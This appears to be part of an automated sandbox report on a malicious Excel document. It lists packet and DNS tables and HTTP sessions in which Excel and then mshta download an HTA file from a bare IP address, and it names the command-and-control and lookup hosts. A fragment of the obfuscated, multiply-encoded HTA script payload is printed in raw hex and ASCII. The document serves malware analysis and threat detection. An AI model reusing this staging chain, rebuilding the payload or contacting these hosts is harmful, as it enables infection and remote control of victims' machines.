                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944633007 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944641113 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944647074 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944653988 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944654942 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944684029 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944916010 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.944957972 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945136070 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945147991 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945157051 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945168972 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945179939 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945183039 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945190907 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945202112 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945207119 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945214033 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945225000 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945229053 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945235014 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945245981 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945246935 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945257902 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945264101 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945271015 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945281029 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945298910 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945319891 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945625067 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945637941 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945650101 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945676088 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945764065 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945775032 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945785999 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945796967 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945804119 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945806980 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945820093 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945825100 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945831060 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945837975 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945842028 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945852995 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945863962 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945864916 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945875883 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945887089 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945895910 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945899010 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945909977 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945926905 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.945946932 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:21.946116924 CEST8049177192.3.220.40192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:22.038700104 CEST4917780192.168.2.22192.3.220.40
                                                                                                                                                                                                                    Oct 8, 2024 15:24:43.895447016 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:43.897069931 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                                                                    Oct 8, 2024 15:24:43.902031898 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:25:13.900110006 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:25:13.901714087 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                                                                    Oct 8, 2024 15:25:13.907239914 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:25:15.509218931 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:15.867515087 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:16.460315943 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:17.661674976 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:20.063935041 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:24.868743896 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:34.462809086 CEST4917580192.168.2.22178.237.33.50
                                                                                                                                                                                                                    Oct 8, 2024 15:25:43.911397934 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:25:43.912936926 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                                                                    Oct 8, 2024 15:25:43.918004990 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:26:13.916706085 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:26:13.926261902 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                                                                    Oct 8, 2024 15:26:13.931376934 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:26:43.933068991 CEST687549173135.148.195.248192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:26:43.936193943 CEST491736875192.168.2.22135.148.195.248
                                                                                                                                                                                                                    Oct 8, 2024 15:26:43.941732883 CEST687549173135.148.195.248192.168.2.22

                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.043407917 CEST5456253192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.059015989 CEST53545628.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.100918055 CEST5291753192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.121041059 CEST53529178.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:54.788644075 CEST6275153192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:23:54.798891068 CEST53627518.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.552449942 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.560094118 CEST53578938.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.578180075 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.589601040 CEST53578938.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:02.204745054 CEST5482153192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:24:02.301563978 CEST53548218.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:03.765734911 CEST5471953192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:24:03.775629044 CEST53547198.8.8.8192.168.2.22
                                                                                                                                                                                                                    Oct 8, 2024 15:24:15.185038090 CEST4988153192.168.2.228.8.8.8
                                                                                                                                                                                                                    Oct 8, 2024 15:24:15.196192026 CEST53498818.8.8.8192.168.2.22

                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.043407917 CEST192.168.2.228.8.8.80x2966Standard query (0)wrath.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.100918055 CEST192.168.2.228.8.8.80x9419Standard query (0)wrath.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:54.788644075 CEST192.168.2.228.8.8.80xada6Standard query (0)ia600102.us.archive.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.552449942 CEST192.168.2.228.8.8.80xd210Standard query (0)wrath.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.578180075 CEST192.168.2.228.8.8.80xd210Standard query (0)wrath.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:24:02.204745054 CEST192.168.2.228.8.8.80xd393Standard query (0)idabo.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:24:03.765734911 CEST192.168.2.228.8.8.80x1ccdStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:24:15.185038090 CEST192.168.2.228.8.8.80xa5ffStandard query (0)ia600102.us.archive.orgA (IP address)IN (0x0001)false

                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.059015989 CEST8.8.8.8192.168.2.220x2966No error (0)wrath.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:39.059015989 CEST8.8.8.8192.168.2.220x2966No error (0)wrath.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.121041059 CEST8.8.8.8192.168.2.220x9419No error (0)wrath.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:41.121041059 CEST8.8.8.8192.168.2.220x9419No error (0)wrath.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:54.798891068 CEST8.8.8.8192.168.2.220xada6No error (0)ia600102.us.archive.org207.241.227.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.560094118 CEST8.8.8.8192.168.2.220xd210No error (0)wrath.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.560094118 CEST8.8.8.8192.168.2.220xd210No error (0)wrath.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.589601040 CEST8.8.8.8192.168.2.220xd210No error (0)wrath.me188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:23:59.589601040 CEST8.8.8.8192.168.2.220xd210No error (0)wrath.me188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:24:02.301563978 CEST8.8.8.8192.168.2.220xd393No error (0)idabo.duckdns.org135.148.195.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:24:03.775629044 CEST8.8.8.8192.168.2.220x1ccdNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                    Oct 8, 2024 15:24:15.196192026 CEST8.8.8.8192.168.2.220xa5ffNo error (0)ia600102.us.archive.org207.241.227.242A (IP address)IN (0x0001)false

                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                    • wrath.me
                                                                                                                                                                                                                    • ia600102.us.archive.org
                                                                                                                                                                                                                    • 192.3.220.40
                                                                                                                                                                                                                    • geoplugin.net

                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    0192.168.2.2249162192.3.220.40803480C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.224842072 CEST351OUTGET /330/uh/newthingtobeonlinefor.hta HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699470997 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:40 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:21:30 GMT
                                                                                                                                                                                                                    ETag: "1d7e1-623f1fc7dcdfc"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 120801
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: application/hta
                                                                                                                                                                                                                    Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 35 33 45 25 32 35 32 35 30 41 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CsCrIpt%252520tyPe%25253D%252522tExT/VbSCRiPt%252522%25253E%25250AdiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699526072 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                                                    Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699541092 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
                                                                                                                                                                                                                    Data Ascii: 52509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699640036 CEST672INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                                                                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699651957 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                                                                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699665070 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699678898 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                                                                                                                                    Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699696064 CEST1236INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699812889 CEST1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                                                                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.699826956 CEST1120INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                                                                                                                                    Oct 8, 2024 15:23:40.705652952 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                                                                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    1192.168.2.2249164192.3.220.40803764C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.415469885 CEST428OUTGET /330/uh/newthingtobeonlinefor.hta HTTP/1.1
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Language: fr-FR
                                                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                    Range: bytes=8896-
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Host: 192.3.220.40
                                                                                                                                                                                                                    If-Range: "1d7e1-623f1fc7dcdfc"
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864491940 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                                                                                                    Date: Tue, 08 Oct 2024 13:23:43 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                    Last-Modified: Tue, 08 Oct 2024 07:21:30 GMT
                                                                                                                                                                                                                    ETag: "1d7e1-623f1fc7dcdfc"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 111905
                                                                                                                                                                                                                    Content-Range: bytes 8896-120800/120801
                                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: application/hta
                                                                                                                                                                                                                    Data Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 [TRUNCATED]
                                                                                                                                                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25253A%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                                                                                                                                    Oct 8, 2024 15:23:43.864507914 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39
